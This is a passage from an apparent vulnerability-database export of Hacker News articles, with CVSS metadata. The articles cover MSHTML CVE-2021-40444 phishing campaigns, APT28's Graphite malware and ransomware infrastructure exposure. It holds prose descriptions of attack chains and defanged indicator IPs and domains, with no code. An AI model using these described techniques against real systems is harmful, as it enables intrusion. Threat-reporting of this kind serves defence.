"[](<https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8>)\n\nA short-lived phishing campaign has been observed taking advantage of a novel exploit that bypassed a patch put in place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component with the goal of delivering Formbook malware.\n\n\"The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker,\" SophosLabs researchers Andrew Brandt and Stephen Ormandy [said](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) in a new report published Tuesday.\n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. Although Microsoft addressed the security weakness as part of its September 2021 [Patch Tuesday updates](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>), it has been put to use in [multiple attacks](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) ever since details pertaining to the flaw became public.\n\nThat same month, the technology giant [uncovered](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. Then in November, SafeBreach Labs [reported](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.\n\nThe new campaign discovered by Sophos aims to get around the patch's protection by morphing a publicly available [proof-of-concept Office exploit](<https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20'Ext2Prot'%20Vulnerability%20'CABless'%20version.pdf>) and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a \"too-narrowly focused patch.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB>)\n\n\"In the initial versions of CVE-2021-40444 exploits, [the] malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file,\" the researchers explained. \"When Microsoft's patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive.\"\n\n**CAB-less 40444**, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. The RAR file, in turn, included a script written in Windows Script Host ([WSH](<https://en.wikipedia.org/wiki/Windows_Script_Host>)) and a Word Document that, upon opening, contacted a remote server hosting malicious JavaScript.\n\nConsequently, the JavaScript code utilized the Word Document as a conduit to launch the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>) malware payload from an attacker-controlled website.\n\nAs for why the exploit disappeared a little over a day in use, clues lie in the fact that the modified RAR archive files wouldn't work with older versions of the WinRAR utility. \"So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release,\" the researchers said.\n\n\"This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases,\" SophosLabs Principal Researcher Andrew Brandt said. \"Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the 'enable content' button.\"\n\n\"It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don't know,\" Brandt added. When reached for a response, a Microsoft spokesperson said \"we are investigating these reports and will take appropriate action as needed to help keep customers protected.\"\n\n**_Update:_** Microsoft told The Hacker News that the aforementioned exploit was indeed addressed with security updates that were released in September 2021. Sophos now notes that the CAB-less 40444 exploit \"may have evaded mitigations of CVE-2021-40444 without the September patch focused on the CAB-style attack\" and that the patch blocks the malicious behavior.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-22T07:45:00", "type": "thn", "title": "New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-29T03:33:40", "id": "THN:8A60310AB796B7372A105B7C8811306B", "href": "https://thehackernews.com/2021/12/new-exploit-lets-malware-attackers.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:39", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjqkUGrj098m-d_WWiB3rvM91Eu1x3fZweKFwfNSYwVrZToTWUlCh3s3UvHQIXtbPP4vPubJ_dEdC7jSX7gGkeScLCqYsa37Zuw_hFBK6g9FbzvO5nMZPrRUk6fjS1F01cduuDD_mnZ-OKnauen-xJmprSHgWH_jmx8MYUffZvp4uojtUBzm6BbCwIZ>)\n\nCybersecurity researchers on Tuesday took the wraps off a multi-stage espionage campaign targeting high-ranking government officials overseeing national security policy and individuals in the defense industry in Western Asia.\n\nThe attack is unique as it leverages Microsoft OneDrive as a command-and-control (C2) server and is split into as many as six stages to stay as hidden as possible, Trellix \u2014 a new company created following the merger of security firms McAfee Enterprise and FireEye \u2014 said in a [report](<https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html>) shared with The Hacker News.\n\n\"This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic,\" Trellix explained.\n\nFirst signs of activity associated with the covert operation are said to have commenced as early as June 18, 2021, with two victims reported on September 21 and 29, followed by 17 more in a short span of three days between October 6 and 8.\n\n\"The attack is particularly unique due to the prominence of its victims, the use of a recent [security flaw], and the use of an attack technique that the team had not seen before,\" Christiaan Beek, lead scientist at Trellix, said. \"The objective was clearly espionage.\"\n\nTrellix attributed the sophisticated attacks with moderate confidence to the Russia-based [APT28](<https://malpedia.caad.fkie.fraunhofer.de/actor/sofacy>) group, also tracked under the monikers Sofacy, Strontium, Fancy Bear, and Sednit, based on similarities in the source code as well as in the attack indicators and geopolitical objectives.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiHATh-_6CXq1DE4gF63tRFptoK4b3k33uBkDfc-JwaJRbLhn0cxU2JHUh5A-0U_AsQ3XgqvcFjPKtR6AVo-_daYwK8-jLWPGzamt2d7MjD1zstHO8IFPqdv3NTZU3GvsI_Wdk9Q7rG6zd84PEcawqbp7bJMrog9xoaUDkiJadygQnO1Wh-qdlH79xN>)\n\n\"We are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were set up,\" Trellix security researcher Marc Elias said.\n\nThe infection chain begins with the execution of a Microsoft Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)), which is used to run a malicious binary that acts as the downloader for a third-stage malware dubbed Graphite.\n\nThe DLL executable uses OneDrive as the C2 server via the Microsoft Graph API to retrieve additional stager malware that ultimately downloads and executes [Empire](<https://attack.mitre.org/software/S0363/>), an open-source PowerShell-based post-exploitation framework widely abused by threat actors for follow-on activities.\n\n\"Using the Microsoft OneDrive as a command-and-control Server mechanism was a surprise, a novel way of quickly interacting with the infected machines by dragging the encrypted commands into the victim's folders,\" Beek explained. \"Next OneDrive would sync with the victim\u2019s machines and encrypted commands being executed, whereafter the requested info was encrypted and sent back to the OneDrive of the attacker.\"\n\nIf anything, the development marks the continued exploitation of the MSTHML rendering engine flaw, with [Microsoft](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) and [SafeBreach Labs](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) disclosing multiple campaigns that have weaponized the vulnerability to plant malware and distribute custom Cobalt Strike Beacon loaders.\n\n\"The main takeaway is to highlight the level of access threat campaigns, and in particular how capable threat actors are able to permeate the most senior levels of government,\" Raj Samani, chief scientist and fellow at Trellix told The Hacker News. \"It is of paramount importance that security practitioners tasked with protecting such high value systems consider additional security measures to prevent, detect and remediate against such hostile actions.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-25T14:04:00", "type": "thn", "title": "Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-29T08:06:51", "id": "THN:BD014635C5F702379060A20290985162", "href": "https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-02T06:04:33", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgRdLCnYaPXc_hVvRWhZ1nKYDtBRo6rwk1xGSO3wDrqcJ04igkpjKQyuyHKgmgeHL6GS7XLJjB6WCffBWb-ntXiCGFrcggxS3t1sQxo2LiuX7WI9F-gwW3tPRARSzEWceyzsLgu1VSyZndaF36ZhDlzpBRvkHLp7Ao_zaUYJmthkY4IZN4znwcyRdpY/s728-e100/hacking.jpg>)\n\nThe Russian state-sponsored threat actor known as [APT28](<https://thehackernews.com/2022/09/researchers-identify-3-hacktivist.html>) has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware.\n\nThe technique \"is designed to be triggered when the user starts the presentation mode and moves the mouse,\" cybersecurity firm Cluster25 [said](<https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/>) in a technical report. \"The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive.\"\n\nThe dropper, a seemingly harmless image file, functions as a pathway for a follow-on payload, a variant of a malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications to retrieve additional payloads.\n\nThe attack employs a lure document that makes use of a template potentially linked to the Organisation for Economic Co-operation and Development ([OECD](<https://en.wikipedia.org/wiki/OECD>)), a Paris-based intergovernmental entity.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjM4urmpBb2OaNLBBurEzXMWD5Gc0bF0d-1A8k55IscX0Hlkq-v1VQ39Xj9y7iwnPFlRBxvY1w6ZlUWb5dYTHpIwA3gVd7mcXXY64dImoNQO7bXe84Wez6JCWTlrdS77BnSIF6DllbmNoGykj67hPrGivBZDqdvzOgXckRo6adoi5bgIMpmnmWEI4_Y/s728-e100/ppt.jpg>)\n\nCluster25 noted the attacks may be ongoing, considering that the URLs used in the attacks appeared active in August and September, although the hackers had previously laid the groundwork for the campaign between January and February.\n\nPotential targets of the operation likely include entities and individuals operating in the defense and government sectors of Europe and Eastern Europe, the company added, citing an analysis of geopolitical objectives and the gathered artifacts.\n\nThis is not the first time the adversarial collective has deployed Graphite. In January 2022, Trellix [disclosed](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>) a similar attack chain that exploited the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) to drop the backdoor.\n\nThe development is a sign that APT28 (aka Fancy Bear) continues to hone its technical tradecraft and evolve its methods for maximum impact as exploitation routes once deemed viable (e.g., macros) cease to be profitable.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-28T10:09:00", "type": "thn", "title": "Hackers Using PowerPoint Mouseover Trick to Infect Systems with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-02T05:18:39", "id": "THN:B399D1943153CEEF405B85D4310C2142", "href": "https://thehackernews.com/2022/09/hackers-using-powerpoint-mouseover.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T07:58:10", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhW8mCPe27LdzHLP4ngj6tlt2Pg8kCf_fM8vePiD96oqVL7MUOW8zxZlXFGU1HvblavK2Xdcm0tf2j7r5qbvTV9iW1N9M95vbWmuFsGUq0MkEeY7rnkpeop76NG41Eys_CeiCVl0xS8l4E21-RosfCrVOTGYR8jNw1F5Q2v-OjF2MeqKfBbPn6bDseq/s728-e100/ransomware.jpg>)\n\nCybersecurity researchers have detailed the various measures ransomware actors have taken to obscure their true identity online as well as the hosting location of their web server infrastructure.\n\n\"Most ransomware operators use hosting providers outside their country of origin (such as Sweden, Germany, and Singapore) to host their ransomware operations sites,\" Cisco Talos researcher Paul Eubanks [said](<https://blog.talosintelligence.com/2022/06/de-anonymizing-ransomware-domains-on.html>). \"They use VPS hop-points as a proxy to hide their true location when they connect to their ransomware web infrastructure for remote administration tasks.\"\n\nAlso prominent are the use of the TOR network and DNS proxy registration services to provide an added layer of anonymity for their illegal operations.\n\nBut by taking advantage of the threat actors' operational security missteps and other techniques, the cybersecurity firm disclosed last week that it was able to identify TOR hidden services hosted on public IP addresses, some of which are previously unknown infrastructure associated with [DarkAngels](<https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/>), [Snatch](<https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch>), [Quantum](<https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware>), and [Nokoyawa](<https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa>) ransomware groups.\n\nWhile ransomware groups are known to rely on the dark web to conceal their illicit activities ranging from leaking stolen data to negotiating payments with victims, Talos disclosed that it was able to identify \"public IP addresses hosting the same threat actor infrastructure as those on the dark web.\"\n\n\"The methods we used to identify the public internet IPs involved matching threat actors' [self-signed] [TLS certificate](<https://www.digicert.com/tls-ssl/tls-ssl-certificates>) serial numbers and page elements with those indexed on the public internet,\" Eubanks said.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjaV9wVlzzeADW3plTap4jOh9fqaG1M5Q8q7q-pX6vbN6EAWqHqnEEvq-nA0yW2N64kchUyacQRbSQXnYk0i2qcd2Lxjiu4alpeum5cu6QCPMBvjt90TSKl-7opy4d0YCn8MX_tPYh7B04Vidh2gZfgYJXxKGevp9NbNa8lZg-DQGZXl7xjDrvwfK89/s728-e100/cert.jpg>)\n\nBesides TLS certificate matching, a second method employed to uncover the adversaries' clear web infrastructures entailed checking the favicons associated with the darknet websites against the public internet using web crawlers like Shodan.\n\nIn the case of [Nokoyawa](<https://www.fortinet.com/blog/threat-research/nokoyawa-variant-catching-up>), a new Windows ransomware strain that appeared earlier this year and shares substantial code similarities with Karma, the site hosted on the TOR hidden service was found to harbor a directory traversal flaw that enabled the researchers to access the \"[/var/log/auth.log](<https://help.ubuntu.com/community/LinuxLogFiles>)\" file used to capture user logins.\n\nThe findings demonstrate that not only are the criminal actors' leak sites accessible for any user on the internet, other infrastructure components, including identifying server data, were left exposed, effectively making it possible to obtain the login locations used to administer the ransomware servers.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiKBfxqmczj3qrieqIFbqxh8pEIBTtSz9_BdFyfDEKmGEjCUPpH7QhuZsHt6jxBWgKWU2wcnFlthPIVmExegrtxg0bzvUln74smXx6Krggvf6_bQ9tr_o1NRTxCcjmsINrMdRyZpvXHdS8zZSeFCw8zi_qx2puc2SGz4zIL9dtTRKkdNSYZMGX3KE3p/s728-e100/keys.jpg>)\n\nFurther analysis of the successful root user logins showed that they originated from two IP addresses 5.230.29[.]12 and 176.119.0[.]195, the former of which belongs to GHOSTnet GmbH, a hosting provider that offers Virtual Private Server (VPS) services.\n\n\"176.119.0[.]195 however belongs to AS58271 which is listed under the name Tyatkova Oksana Valerievna,\" Eubanks noted. \"It's possible the operator forgot to use the German-based VPS for obfuscation and logged into a session with this web server directly from their true location at 176.119.0[.]195.\"\n\n### LockBit adds a bug bounty program to its revamped RaaS operation\n\nThe development comes as the operators of the emerging [Black Basta](<https://thehackernews.com/2022/06/cybersecurity-experts-warn-of-emerging.html>) ransomware [expanded](<https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html>) their attack arsenal by using QakBot for initial access and lateral movement, and taking advantage of the PrintNightmare vulnerability ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>)) to conduct privileged file operations.\n\nWhat's more, the LockBit ransomware gang last week [announced](<https://twitter.com/vxunderground/status/1541156954214727685>) the release of LockBit 3.0 with the message \"Make Ransomware Great Again!,\" in addition to launching their own Bug Bounty program, offering rewards ranging between $1,000 and $1 million for identifying security flaws and \"brilliant ideas\" to improve its software.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwyY9trUR2Z6AyEmJ7Zm0vLXiYawK0UpJysKcAGEK4eyTyY-cibr3Vgf7ATbqzCSSUqeTQTR_TQkAtJ5XPpqiw8JZnWQg1KTo0ktefqdmaqc8XFgVp27DzMej76ut1FMMJ8h0r2U-UR72FNxbM4_q9ph1cAzMroG_05T9as1lDjAVK34y53Er0koFQ/s728-e100/bug.jpg>)\n\n\"The release of LockBit 3.0 with the introduction of a bug bounty program is a formal invitation to cybercriminals to help assist the group in its quest to remain at the top,\" Satnam Narang, senior staff research engineer at Tenable, said in a statement shared with The Hacker News.\n\n\"A key focus of the bug bounty program are defensive measures: Preventing security researchers and law enforcement from finding bugs in its leak sites or ransomware, identifying ways that members including the affiliate program boss could be doxed, as well as finding bugs within the messaging software used by the group for internal communications and the Tor network itself.\"\n\n\"The threat of being doxed or identified signals that law enforcement efforts are clearly a great concern for groups like LockBit. Finally, the group is planning to offer Zcash as a payment option, which is significant, as Zcash is harder to trace than Bitcoin, making it harder for researchers to keep tabs on the group's activity.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T07:06:00", "type": "thn", "title": "Researchers Share Techniques to Uncover Anonymized Ransomware Sites on Dark Web", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-07-06T06:06:49", "id": "THN:849B821D3503018DA38FAFFBC34DAEBB", "href": "https://thehackernews.com/2022/07/researchers-share-techniques-to-uncover.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEguJG5dD1Vh67fJlg0O-HXucpsF2Y-eVW6kua8F3Er_7OwG5WZpZAqvZHKbXJboPvuTyfrTXpc260OZ87-4ehJm-_qY8JOnLJxhWok-es74ZTW3O7ua3WuueglfYtH7632jDmh5DfPftDD998FED2xruJFMtTPwe_eI7umOKXrdazu4WRTC-OnHg7ND>)\n\nThe clearnet and dark web payment portals operated by the [Conti](<https://thehackernews.com/2021/05/fbi-warns-conti-ransomware-hit-16-us.html>) ransomware group have gone down in what appears to be an attempt to shift to new infrastructure after details about the gang's inner workings and its members were made public.\n\nAccording to [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1461450607311605766>), \"while both the clearweb and Tor domains of the leak site of the Conti ransomware gang is online and working, both their clearweb and Tor domains for the payment site (which is obviously more important than the leak) is down.\"\n\nIt's not clear what prompted the shutdown, but the development comes as Swiss cybersecurity firm PRODAFT [offered](<https://www.prodaft.com/resource/detail/conti-ransomware-group-depth-analysis>) an unprecedented look into the group's ransomware-as-a-service (RaaS) model, wherein the developers sell or lease their ransomware technology to affiliates hired from darknet forums, who then carry out attacks on their behalf while also netting about 70% of each ransom payment extorted from the victims.\n\nThe result? Three members of the Conti team have been identified so far, each playing the roles of admin (\"Tokyo\"), assistant (\"it_work_support@xmpp[.]jp\"), and recruiter (\"IT_Work\") to attract new affiliates into their network.\n\nWhile ransomware attacks work by encrypting the victims' sensitive information and rendering it inaccessible, threat actors have increasingly latched on to a two-pronged strategy called double extortion to demand a ransom payment for decrypting the data and threaten to publicly publish the stolen information if the payment is not received within a specific deadline.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgOlxdMar0Fk9C_1oq4rsZqCsRuaWDFa_UwPznj1p4XnxV22g7c-3gidrF7ZVnxd0TVDTn8qhzr16V265fVSa3d-p7SOODkUMikIREYKzV6MyCaPI1KWzNgYj3TduhqzgszRUX6zZkCytED5c4K-icaEZjwN4cvwnz1D0zehnwVGdYAwJXLo8uaJijX>)\n\n\"Conti customers \u2013 affiliate threat actors \u2013 use [a digital] management panel to create new ransomware samples, manage their victims, and collect data on their attacks,\" noted the researchers, detailing the syndicate's attack kill chain leveraging PrintNightmare ([CVE-2021-1675](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>), [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>), and [CVE-2021-36958](<https://thehackernews.com/2021/08/microsoft-security-bulletin-warns-of.html>)) and FortiGate ([CVE-2018-13374](<https://nvd.nist.gov/vuln/detail/CVE-2018-13374>) and [CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)) vulnerabilities to compromise unpatched systems.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEh5pQ7nISIe-f2lC7T7iJVkfmQ4L9uCXsO1rxdPo0YzkwJ4-Q15UkgDuRGhckTpdbAYrR1h3kYePBPrRNFWefg6MtaX_jlMsgcojwvu-zrrtvaw0hKxGJkD-dTl06UiZOX1R5kuboLkxyuot8hDBrgxX1fH8yoVdsv0e1f0rvziG6_Mw-IWMJUBBgQg>)\n\nEmerging on the cybercrime landscape in October 2019, Conti is believed to be the work of a Russia-based threat group called [Wizard Spider](<https://malpedia.caad.fkie.fraunhofer.de/actor/wizard_spider>), which is also the operator of the infamous [TrickBot](<https://thehackernews.com/2021/11/trickbot-operators-partner-with-shatak.html>) banking malware. Since then, at least 567 different companies have had their business-critical data exposed on the victim shaming site, with the ransomware cartel receiving over 500 bitcoin ($25.5 million) in payments since July 2021.\n\nWhat's more, an analysis of ransomware samples and the bitcoin wallet addresses utilized for receiving the payments has revealed a connection between Conti and Ryuk, with both families heavily banking on TrickBot, Emotet, and BazarLoader for actually [delivering the file-encrypting payloads](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) onto victim's networks via email phishing and other social engineering schemes.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgySne4_su9eRCap6MABBaa8kbBo2rWbr8gzBUOmkmLhbonXU-etPl5K4VuXHkduN2lH7fMHbQ7q8Wq0HsqBnUz9P3JWJBqtztJQAEPOJWnoAVuecd8Zyblq-TOPPfmILc40tmzfs9VX0h_utrR3fydA8JQm8EO0PO7BIKlRaSIBA8_I717s_bvckQ5>)\n\nPRODAFT said it was also able to gain access to the group's recovery service and an admin management panel hosted as a Tor hidden service on an Onion domain, revealing extensive details of a clearnet website called \"contirecovery[.]ws\" that contains instructions for purchasing decryption keys from the affiliates. Interestingly, an investigation into Conti's ransomware negotiation process [published](<https://team-cymru.com/blog/2021/10/05/collaborative-research-on-the-conti-ransomware-group/>) by Team Cymru last month highlighted a similar open web URL named \"contirecovery[.]info.\"\n\n\"In order to tackle the complex challenge of disrupting cybercriminal organizations, public and private forces need to work collaboratively with one another to better understand and mitigate the wider legal and commercial impact of the threat,\" the researchers said.\n\n**_Update:_** The Conti ransomware's payment [portals](<https://twitter.com/VK_Intel/status/1461810216241086467>) are back up and running, more than 24 hours after they were first taken down in response to a report that identified the real IP address of one of its recovery (aka payment) servers \u2014 217.12.204[.]135 \u2014 thereby effectively bolstering its security measures.\n\n\"Looks like Europeans have also decided to abandon their manners and go full-gansta simply trying to break our systems,\"the gang said in a statement posted on their blog, effectively confirming PRODAFT's findings, but characterizing the details as \"simply disinformation,\" and that \"the reported 25kk which we 'made since July' is straight-up BS - we've made around 300kk at least.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-19T06:50:00", "type": "thn", 